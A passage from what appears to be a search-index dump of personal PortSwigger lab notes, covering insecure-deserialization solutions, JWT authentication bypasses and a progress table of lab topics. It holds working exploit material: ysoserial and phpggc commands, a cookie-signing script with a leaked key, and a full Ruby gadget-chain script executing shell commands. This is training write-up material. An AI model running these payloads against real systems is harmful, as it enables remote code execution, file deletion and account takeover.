        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_3","title":"Solution","text":"

        Review the code and notice CustomerTemplate.php

        Read the file by adding a virgule and find an interesting method:

        The cookie session consisted on a serialized object.

        We will craft a seriealized object that triggers the interested method allocated in CustomTemplate.php and pass it base-64 encoded via the Inspector module:

        O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}\n

        Run the request!

        # Burp solution\n1. Log in to your own account and notice the session cookie contains a serialized PHP object.\n2. From the site map, notice that the website references the file `/libs/CustomTemplate.php`. Right-click on the file and select \"Send to Repeater\".\n3. In Burp Repeater, notice that you can read the source code by appending a tilde (`~`) to the filename in the request line.\n4. In the source code, notice the `CustomTemplate` class contains the `__destruct()` magic method. This will invoke the `unlink()` method on the `lock_file_path` attribute, which will delete the file on this path.\n5. In Burp Decoder, use the correct syntax for serialized PHP data to create a `CustomTemplate` object with the `lock_file_path` attribute set to `/home/carlos/morale.txt`. Make sure to use the correct data type labels and length indicators. The final object should look like this:\n\n    `O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}`\n6. Base64 and URL-encode this object and save it to your clipboard.\n7. Send a request containing the session cookie to Burp Repeater.\n8. In Burp Repeater, replace the session cookie with the modified one in your clipboard.\n9. Send the request. The `__destruct()` magic method is automatically invoked and will delete Carlos's file.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-java-deserialization-with-apache-commons","title":"Exploiting Java deserialization with Apache Commons","text":"

        PRACTITIONER Exploiting Java deserialization with Apache Commons

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_4","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and loads the Apache Commons Collections library. Although you don't have source code access, you can still exploit this lab using pre-built gadget chains.

        To solve the lab, use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos's home directory.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_4","title":"Solution","text":"

        Install the following two plugins in Burpsuite: Java Deserialization Scanner and Java Serial Killer. With those, when browsing the site the Live audit will show us deserialization issues:

        In the Burpsuite scanner see the issues already identified.

        Paste the vulnerable request in Deserialization Scanner > Manual testing:

        Click on All issues and you can identify a disclosed vulnerability on library Apache Commons Collections 4. This will help in the following steps.

        Now we can craft a payload using ysoserial tool (see debugging and installation there).

        As we have a java version 11, our payload will be:

        java -jar ysoserial-all.jar CommonsCollections4 \"rm /home/carlos/morale.txt\" | base64 -w 0 > test.txt\n\n# -w 0 : it will remove the end of lines.\n

        Now, we copy paste that value in the Cookie session, then we select it and with CTRL-u, we url-encode it (the key characters). Then we send the request.

        # Burp solution\n\n1. Log in to your own account and observe that the session cookie contains a serialized Java object. Send a request containing your session cookie to Burp Repeater.\n2. Download the \"ysoserial\" tool and execute the following command. This generates a Base64-encoded serialized object containing your payload:\n\n    - In Java versions 16 and above:\n\n        `java -jar ysoserial-all.jar \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \\ --add-opens=java.base/java.net=ALL-UNNAMED \\ --add-opens=java.base/java.util=ALL-UNNAMED \\ CommonsCollections4 'rm /home/carlos/morale.txt' | base64`\n    - In Java versions 15 and below:\n\n        `java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64`\n3. In Burp Repeater, replace your session cookie with the malicious one you just created. Select the entire cookie and then URL-encode it.\n4. Send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-php-deserialization-with-a-pre-built-gadget-chain","title":"Exploiting PHP deserialization with a pre-built gadget chain","text":"

        PRACTITIONER Exploiting PHP deserialization with a pre-built gadget chain

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_5","title":"Enunciation","text":"

        This lab has a serialization-based session mechanism that uses a signed cookie. It also uses a common PHP framework. Although you don't have source code access, you can still exploit this lab's insecure deserialization using pre-built gadget chains.

        To solve the lab, identify the target framework then use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, work out how to generate a valid signed cookie containing your malicious object. Finally, pass this into the website to delete the morale.txt file from Carlos's home directory.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_5","title":"Solution","text":"

        1. The cookie contains a Base64-encoded token, signed with a SHA-1 HMAC hash.

        2. Changing cookie to a fake value will expose the Sympfony 4.3.6 php library.

        3. Also have a look at the secret_key revealed in the commented url.

        4. phpgcc has a gadget chain for that library

        5. Create your payload with:

        ./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64 -w 0 > test.txt\n

        6. Construct a valid cookie containing this malicious object and sign it correctly using the secret key. Using this template:

        <?php \n$object = \"OBJECT-GENERATED-BY-PHPGGC\"; \n$secretKey = \"LEAKED-SECRET-KEY-FROM-PHPINFO.PHP\"; \n$cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}'); \necho $cookie;\n

        Generate a file lab.php customizing the script. Use the $secretKey obtained in step 3. Use the payload generated in step 5 for the $object.

        ?php\n$object = \"Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRh>\n$secretKey = \"cvb2w284adozzw3m2wgbhmxn7ezi9s4v\";\n$cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}');\necho $cookie;\n

        7. Add permissions and run it:

        chmod +x lab.php\nphp lab.php\n

        8. Place the generated cookie in the Coodie session in the Repeater and Send the request.

        # Burp solution\n1. Log in and send a request containing your session cookie to Burp Repeater. Highlight the cookie and look at the **Inspector** panel.\n2. Notice that the cookie contains a Base64-encoded token, signed with a SHA-1 HMAC hash.\n3. Copy the decoded cookie from the **Inspector** and paste it into Decoder.\n4. In Decoder, highlight the token and then select **Decode as > Base64**. Notice that the token is actually a serialized PHP object.\n5. In Burp Repeater, observe that if you try sending a request with a modified cookie, an exception is raised because the digital signature no longer matches. However, you should notice that:\n    - A developer comment discloses the location of a debug file at `/cgi-bin/phpinfo.php`.\n    - The error message reveals that the website is using the Symfony 4.3.6 framework.\n6. Request the `/cgi-bin/phpinfo.php` file in Burp Repeater and observe that it leaks some key information about the website, including the `SECRET_KEY` environment variable. Save this key; you'll need it to sign your exploit later.\n7. Download the \"PHPGGC\" tool and execute the following command:\n\n    `./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64`\n\n    This will generate a Base64-encoded serialized object that exploits an RCE gadget chain in Symfony to delete Carlos's `morale.txt` file.\n\n8. You now need to construct a valid cookie containing this malicious object and sign it correctly using the secret key you obtained earlier. You can use the following PHP script to do this. Before running the script, you just need to make the following changes:\n\n    - Assign the object you generated in PHPGGC to the `$object` variable.\n    - Assign the secret key that you copied from the `phpinfo.php` file to the `$secretKey` variable.\n\n    `<?php $object = \"OBJECT-GENERATED-BY-PHPGGC\"; $secretKey = \"LEAKED-SECRET-KEY-FROM-PHPINFO.PHP\"; $cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}'); echo $cookie;`\n\n    This will output a valid, signed cookie to the console.\n\n9. In Burp Repeater, replace your session cookie with the malicious one you just created, then send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-ruby-deserialization-using-a-documented-gadget-chain","title":"Exploiting Ruby deserialization using a documented gadget chain","text":"

        PRACTITIONER Exploiting Ruby deserialization using a documented gadget chain

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_6","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and the Ruby on Rails framework. There are documented exploits that enable remote code execution via a gadget chain in this framework.

        To solve the lab, find a documented exploit and adapt it to create a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos's home directory.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_6","title":"Solution","text":"

        1. Provoke an error message to disclose the library performing deserialization in the cookie session:

        2. Find a documented vulnerability for that library at https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html

        3. Copy the original script:

        # Autoload the required classes\nGem::SpecFetcher\nGem::Installer\n\n# prevent the payload from running when we Marshal.dump it\nmodule Gem\n  class Requirement\n    def marshal_dump\n      [@requirements]\n    end\n  end\nend\n\nwa1 = Net::WriteAdapter.new(Kernel, :system)\n\nrs = Gem::RequestSet.allocate\nrs.instance_variable_set('@sets', wa1)\nrs.instance_variable_set('@git_set', \"id\")\n\nwa2 = Net::WriteAdapter.new(rs, :resolve)\n\ni = Gem::Package::TarReader::Entry.allocate\ni.instance_variable_set('@read', 0)\ni.instance_variable_set('@header', \"aaa\")\n\n\nn = Net::BufferedIO.allocate\nn.instance_variable_set('@io', i)\nn.instance_variable_set('@debug_output', wa2)\n\nt = Gem::Package::TarReader.allocate\nt.instance_variable_set('@io', n)\n\nr = Gem::Requirement.allocate\nr.instance_variable_set('@requirements', t)\n\npayload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])\nputs payload.inspect\nputs Marshal.load(payload)\n

        4. And modify it:

        # Autoload the required classes\nGem::SpecFetcher\nGem::Installer\n\n# prevent the payload from running when we Marshal.dump it\nmodule Gem\n  class Requirement\n    def marshal_dump\n      [@requirements]\n    end\n  end\nend\n\nwa1 = Net::WriteAdapter.new(Kernel, :system)\n\nrs = Gem::RequestSet.allocate\nrs.instance_variable_set('@sets', wa1)\nrs.instance_variable_set('@git_set', \"rm /home/carlos/morale.txt\")\n\nwa2 = Net::WriteAdapter.new(rs, :resolve)\n\ni = Gem::Package::TarReader::Entry.allocate\ni.instance_variable_set('@read', 0)\ni.instance_variable_set('@header', \"aaa\")\n\n\nn = Net::BufferedIO.allocate\nn.instance_variable_set('@io', i)\nn.instance_variable_set('@debug_output', wa2)\n\nt = Gem::Package::TarReader.allocate\nt.instance_variable_set('@io', n)\n\nr = Gem::Requirement.allocate\nr.instance_variable_set('@requirements', t)\n\npayload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])\nputs Base64.encode64(payload)\n

        Changes made:

        • Last two lines to puts Base64.encode64(payload)
        • User line rs.instance_variable_set('@git_set', \"id\") to inject the payload rs.instance_variable_set('@git_set', \"rm /home/carlos/morale.txt\").

        5. Run it. You can use https://onecompiler.com/ruby/

        6. Paste the generated payload into the session cookie in the repeater and have sent the request.

        # Burp solution\n1. Log in to your own account and notice that the session cookie contains a serialized (\"marshaled\") Ruby object. Send a request containing this session cookie to Burp Repeater.\n2. Browse the web to find the `Universal Deserialisation Gadget for Ruby 2.x-3.x` by `vakzz` on `devcraft.io`. Copy the final script for generating the payload.\n3. Modify the script as follows:\n    - Change the command that should be executed from `id` to `rm /home/carlos/morale.txt`.\n    - Replace the final two lines with `puts Base64.encode64(payload)`. This ensures that the payload is output in the correct format for you to use for the lab.\n4. Run the script and copy the resulting Base64-encoded object.\n5. In Burp Repeater, replace your session cookie with the malicious one that you just created, then URL encode it.\n6. Send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_7","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_7","title":"Solution","text":"
        # Burp solution\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j_1","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_8","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_8","title":"Solution","text":"
        # Burp solution\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j_2","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_9","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_9","title":"Solution","text":"
        # Burp solution\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-jwt/","title":"BurpSuite Labs - Json Web Token jwt","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-unverified-signature","title":"JWT authentication bypass via unverified signature","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. Due to implementation flaws, the server doesn't verify the signature of any JWTs that it receives.

        To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution","title":"Solution","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-flawed-signature-verification","title":"JWT authentication bypass via flawed signature verification","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_1","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.

        To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_1","title":"Solution","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-weak-signing-key","title":"JWT authentication bypass via weak signing key","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_2","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.

        To solve the lab, first brute-force the website's secret key. Once you've obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_2","title":"Solution","text":"

        Capture the JWT of wiener user and run hashcat with a well-known dictionary of jwt secrets such as https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

        hashcat -a 0 -m 16500 capturedJWT <wordlist>\n

        Results:

        eyJraWQiOiI2YTNmZjdmMi0xMDNmLTQyZGEtYmNkZC0yN2JiZmM4ZTU3OTQiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNDYwMTIyNSwic3ViIjoid2llbmVyIn0.AeWLmJpWTsA-c-dA5j6UHIQ-f9Mo6F9Y-OrXBsGu6Gw:secret1\n

        Open JWT Editor, go to Keys tab and generate a new signature.

        Send your request to repeater, go to JSON Web Token tab, modify username to administrator, click on Sign and select your signature. Modify endpoint to /admin and send request.

        Trigger the delete user carlos endpoint:

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-jwk-header-injection","title":"JWT authentication bypass via jwk header injection","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_3","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. The server supports the jwk parameter in the JWT header. This is sometimes used to embed the correct verification key directly in the token. However, it fails to check whether the provided key came from a trusted source.

        To solve the lab, modify and sign a JWT that gives you access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_3","title":"Solution","text":"

        Capture wiener JWT and send the request GET /admin to the Repeater module. Once there, go to JSON Web Token tab and:

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-jku-header-injection","title":"JWT authentication bypass via jku header injection","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_4","title":"Enunciation","text":"

        This lab uses a JWT-based mechanism for handling sessions. The server supports the jku parameter in the JWT header. However, it fails to check whether the provided URL belongs to a trusted domain before fetching the key.

        To solve the lab, forge a JWT that gives you access to the admin panel at /admin, then delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_4","title":"Solution","text":"
        ##### Part 1 - Upload a malicious JWK Set\n\n1. In Burp, load the JWT Editor extension from the BApp store.\n\n2. In the lab, log in to your own account and send the post-login `GET /my-account` request to Burp Repeater.\n\n3. In Burp Repeater, change the path to `/admin` and send the request. Observe that the admin panel is only accessible when logged in as the `administrator` user.\n\n4. Go to the **JWT Editor Keys** tab in Burp's main tab bar.\n\n5. Click **New RSA Key**.\n\n6. In the dialog, click **Generate** to automatically generate a new key pair, then click **OK** to save the key. Note that you don't need to select a key size as this will automatically be updated later.\n\n7. In the browser, go to the exploit server.\n\n8. Replace the contents of the **Body** section with an empty JWK Set as follows:\n\n    `{ \"keys\": [ ] }`\n9. Back on the **JWT Editor Keys** tab, right-click on the entry for the key that you just generated, then select **Copy Public Key as JWK**.\n\n10. Paste the JWK into the `keys` array on the exploit server, then store the exploit. The result should look something like this:\n\n    `{ \"keys\": [ { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"893d8f0b-061f-42c2-a4aa-5056e12b8ae7\", \"n\": \"yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw\" } ] }`\n\n##### Part 2 - Modify and sign the JWT\n\n1. Go back to the `GET /admin` request in Burp Repeater and switch to the extension-generated **JSON Web Token** message editor tab.\n\n2. In the header of the JWT, replace the current value of the `kid` parameter with the `kid` of the JWK that you uploaded to the exploit server.\n\n3. Add a new `jku` parameter to the header of the JWT. Set its value to the URL of your JWK Set on the exploit server.\n\n4. In the payload, change the value of the `sub` claim to `administrator`.\n\n5. At the bottom of the tab, click **Sign**, then select the RSA key that you generated in the previous section.\n\n6. Make sure that the **Don't modify header** option is selected, then click **OK**. The modified token is now signed with the correct signature.\n\n7. Send the request. Observe that you have successfully accessed the admin panel.\n\n8. In the response, find the URL for deleting `carlos` (`/admin/delete?username=carlos`). Send the request to this endpoint to solve the lab.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_5","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_5","title":"Solution","text":"

        I

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b_1","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_6","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_6","title":"Solution","text":"

        I

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b_2","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_7","title":"Enunciation","text":"

        T

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_7","title":"Solution","text":"

        I

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-labs/","title":"BurpSuite Labs","text":"","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#sql-injection","title":"SQL injection","text":"Solution SQL injection level link Solved sqli-1 SQL injection Apprentice SQL injection vulnerability in WHERE clause allowing retrieval of hidden data Solved sqli-2 SQL injection Apprentice SQL injection vulnerability allowing login bypass Solved sqli-3 SQL injection Practitioner SQL injection UNION attack, determining the number of columns returned by the query Solved sqli-4 SQL injection Practitioner SQL injection UNION attack, finding a column containing text Solved sqli-5 SQL injection Practitioner SQL injection UNION attack, retrieving data from other tables Solved sqli-6 SQL injection Practitioner SQL injection UNION attack, retrieving multiple values in a single column Solved SQL injection Practitioner SQL injection attack, querying the database type and version on Oracle Not solved SQL injection Practitioner SQL injection attack, querying the database type and version on MySQL and Microsoft Not solved SQL injection Practitioner SQL injection attack, listing the database contents on non-Oracle databases Not solved SQL injection Practitioner SQL injection attack, listing the database contents on Oracle Not solved SQL injection Practitioner Blind SQL injection with conditional responses Not solved SQL injection Practitioner Blind SQL injection with conditional errors Not solved SQL injection Practitioner Blind SQL injection with time delays Not solved SQL injection Practitioner Blind SQL injection with time delays and information retrieval Not solved SQL injection Practitioner Blind SQL injection with out-of-band interaction Not solved SQL injection Practitioner Blind SQL injection with out-of-band data exfiltration Not solved SQL injection Practitioner SQL injection with filter bypass via XML encoding Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-site-scripting","title":"Cross-site scripting","text":"Solution level link Solved Solution xss-1 Cross-site scripting Apprentice Reflected XSS into HTML context with nothing encoded Solved xss-2 Cross-site scripting Apprentice Stored XSS into HTML context with nothing encoded Solved xss-3 Cross-site scripting Apprentice DOM XSS in\u00a0document.write\u00a0sink using source\u00a0location.search Solved xss-4 Cross-site scripting Apprentice DOM XSS in\u00a0innerHTML\u00a0sink using source\u00a0location.search Solved xss-5 Cross-site scripting Apprentice DOM XSS in jQuery anchor\u00a0href\u00a0attribute sink using\u00a0location.search\u00a0source Solved xss-6 Cross-site scripting Apprentice DOM XSS in jQuery selector sink using a hashchange event Solved Cross-site scripting Apprentice Reflected XSS into attribute with angle brackets HTML-encoded Not solved Cross-site scripting Apprentice Stored XSS into anchor\u00a0href\u00a0attribute with double quotes HTML-encoded Not solved Cross-site scripting Apprentice Reflected XSS into a JavaScript string with angle brackets HTML encoded Not solved Cross-site scripting (burpsuite-xss.md) Practitioner DOM XSS in\u00a0document.write\u00a0sink using source\u00a0location.search\u00a0inside a select element Not solved Cross-site scripting Practitioner DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded Not solved Cross-site scripting Practitioner Reflected DOM XSS Not solved Cross-site scripting Practitioner Stored DOM XSS Not solved Cross-site scripting Practitioner Exploiting cross-site scripting to steal cookies Not solved Cross-site scripting Practitioner Exploiting cross-site scripting to capture passwords Not solved Cross-site scripting Practitioner Exploiting XSS to perform CSRF Not solved Cross-site scripting Practitioner Reflected XSS into HTML context with most tags and attributes blocked Not solved Cross-site scripting Practitioner Reflected XSS into HTML context with all tags blocked except custom ones Not solved Cross-site scripting Practitioner Reflected XSS with some SVG markup allowed Not solved Cross-site scripting Practitioner Reflected XSS in canonical link tag Not solved Cross-site scripting Practitioner Reflected XSS into a JavaScript string with single quote and backslash escaped Not solved Cross-site scripting Practitioner Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped Not solved Cross-site scripting Practitioner Stored XSS into\u00a0onclick\u00a0event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped Not solved Cross-site scripting Practitioner Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped Not solved Cross-site scripting Expert Reflected XSS with event handlers and\u00a0href\u00a0attributes blocked Not solved Cross-site scripting Expert Reflected XSS in a JavaScript URL with some characters blocked Not solved Cross-site scripting Expert Reflected XSS with AngularJS sandbox escape without strings Not solved Cross-site scripting Expert Reflected XSS with AngularJS sandbox escape and CSP Not solved Cross-site scripting Expert Reflected XSS protected by very strict CSP, with dangling markup attack Not solved Cross-site scripting Expert Reflected XSS protected by CSP, with CSP bypass Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-site-request-forgery","title":"Cross-Site Request Forgery","text":"Cross-site Request Forgery level link Solved Cross-site Request Forgery Apprentice CSRF vulnerability with no defenses Not solved Cross-site Request Forgery Practitioner CSRF where token validation depends on request method Not solved Cross-site Request Forgery Practitioner CSRF where token validation depends on token being present Not solved Cross-site Request Forgery Practitioner CSRF where token is not tied to user session Not solved Cross-site Request Forgery Practitioner CSRF where token is tied to non-session cookie Not solved Cross-site Request Forgery Practitioner CSRF where token is duplicated in cookie Not solved Cross-site Request Forgery Practitioner SameSite Lax bypass via method override Not solved Cross-site Request Forgery Practitioner SameSite Strict bypass via client-side redirect Not solved Cross-site Request Forgery Practitioner SameSite Strict bypass via sibling domain Not solved Cross-site Request Forgery Practitioner SameSite Lax bypass via cookie refresh Not solved Cross-site Request Forgery Practitioner CSRF where Referer validation depends on header being present Not solved Cross-site Request Forgery Practitioner CSRF with broken Referer validation Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#clickjacking","title":"Clickjacking","text":"Clikjacking level link Solved Clikjacking Apprentice Basic clickjacking with CSRF token protection Not solved Clikjacking Apprentice Clickjacking with form input data prefilled from a URL parameter Not solved Clikjacking Apprentice Clickjacking with a frame buster script Not solved Clikjacking Practitioner Exploiting clickjacking vulnerability to trigger DOM-based XSS Not solved Clikjacking Practitioner Multistep clickjacking Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#dom-based-vulnerabilities","title":"DOM-based vulnerabilities","text":"DOM-based vulnerabilities level link Solved DOM-based vulnerabilities Practitioner DOM XSS using web messages Not solved DOM-based vulnerabilities Practitioner DOM XSS using web messages and a JavaScript URL Not solved DOM-based vulnerabilities Practitioner DOM XSS using web messages and\u00a0JSON.parse Not solved DOM-based vulnerabilities Practitioner DOM-based open redirection Not solved DOM-based vulnerabilities Practitioner DOM-based cookie manipulation Not solved DOM-based vulnerabilities Expert Exploiting DOM clobbering to enable XSS Not solved DOM-based vulnerabilities Expert Clobbering DOM attributes to bypass HTML filters Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-origin-resource-sharing","title":"Cross-origin resource sharing","text":"Cross-origin resource sharing level link Solved Cross-origin resource sharing Apprentice CORS vulnerability with basic origin reflection Not solved Cross-origin resource sharing Apprentice CORS vulnerability with trusted null origin Not solved Cross-origin resource sharing Practitioner CORS vulnerability with trusted insecure protocols Not solved Cross-origin resource sharing Expert CORS vulnerability with internal network pivot attack Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#xml-external-entity","title":"XML external entity","text":"XML external entity level link Solved xxe-1 Apprentice Exploiting XXE using external entities to retrieve files Solved xxe-2 Apprentice Exploiting XXE to perform SSRF attacks Solved xxe-3 Practitioner Blind XXE with out-of-band interaction Solved xxe-4 Practitioner Blind XXE with out-of-band interaction via XML parameter entities Solved xxe-5 Practitioner Exploiting blind XXE to exfiltrate data using a malicious external DTD Solved xxe-6 Practitioner Exploiting blind XXE to retrieve data via error messages Solved xxe-7 Practitioner Exploiting XInclude to retrieve files Solved xxe-8 Practitioner Exploiting XXE via image file upload Solved xxe-9 Expert Exploiting XXE to retrieve data by repurposing a local DTD Solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#server-side-request-forgery","title":"Server-side request forgery","text":"Server-side request forgery level link Solved ssrf-1 Server-side request forgery Apprentice Basic SSRF against the local server Solved ssrf-2 Server-side request forgery Apprentice Basic SSRF against another back-end system Solved ssrf-3 Server-side request forgery Practitioner SSRF with blacklist-based input filter Solved ssrf-4 Server-side request forgery Practitioner SSRF with filter bypass via open redirection vulnerability Not solved Server-side request forgery Practitioner Blind SSRF with out-of-band detection Not solved Server-side request forgery Expert SSRF with whitelist-based input filter Not solved Server-side request forgery Expert Blind SSRF with Shellshock exploitation Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#http-request-smuggling","title":"HTTP request smuggling","text":"HTTP request smuggling level link Solved HTTP request smuggling Practitioner HTTP request smuggling, basic CL.TE vulnerability Not solved HTTP request smuggling Practitioner HTTP request smuggling, basic TE.CL vulnerability Not solved HTTP request smuggling Practitioner HTTP request smuggling, obfuscating the TE header Not solved HTTP request smuggling Practitioner HTTP request smuggling, confirming a CL.TE vulnerability via differential responses Not solved HTTP request smuggling Practitioner HTTP request smuggling, confirming a TE.CL vulnerability via differential responses Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to reveal front-end request rewriting Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to capture other users' requests Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to deliver reflected XSS Not solved HTTP request smuggling Practitioner Response queue poisoning via H2.TE request smuggling Not solved HTTP request smuggling Practitioner H2.CL request smuggling Not solved HTTP request smuggling Practitioner HTTP/2 request smuggling via CRLF injection Not solved HTTP request smuggling Practitioner HTTP/2 request splitting via 